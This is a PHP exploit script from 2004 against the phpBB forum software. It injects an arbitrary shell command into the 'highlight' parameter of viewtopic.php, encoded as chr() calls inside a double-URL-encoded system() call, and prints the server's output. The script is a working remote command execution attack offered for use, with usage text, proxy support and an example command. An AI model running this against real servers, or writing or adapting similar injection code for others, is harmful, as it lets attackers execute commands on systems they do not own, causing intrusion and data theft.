#!/usr/bin/php -q # 15th November 2004 : 4:04 a.m # # bug found by How Dark (http://www.howdark.com) (1st October 2004) # # Requirement: # # PHP 4.x with curl extension; # # ** Selamat Hari Raya ** */ if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit; } if ($argv[2]){ $url = $argv[1]; $command = $argv[2]; } else { echo "Usage: ".$argv[0]." [topic id] [proxy]\n\n"; echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n"; echo "\tcommand\t command to execute on server (ex: 'ls -la')\n"; echo "\ttopic_id\t topic id\n"; echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n"; exit; } if ($argv[3]) $topic = $argv[3]; else $topic = 1; if ($argv[4]) $proxy = $argv[4]; $cmd = str2chr($command); $action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527"; $ch=curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.$action); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); echo $res; function str2chr($str){ for($i = 0;$i < strlen($str);$i++){ $chr .= "chr(".ord($str{$i}).")"; if ($i != strlen($str) -1) $chr .= "%252e"; } return $chr; } ?>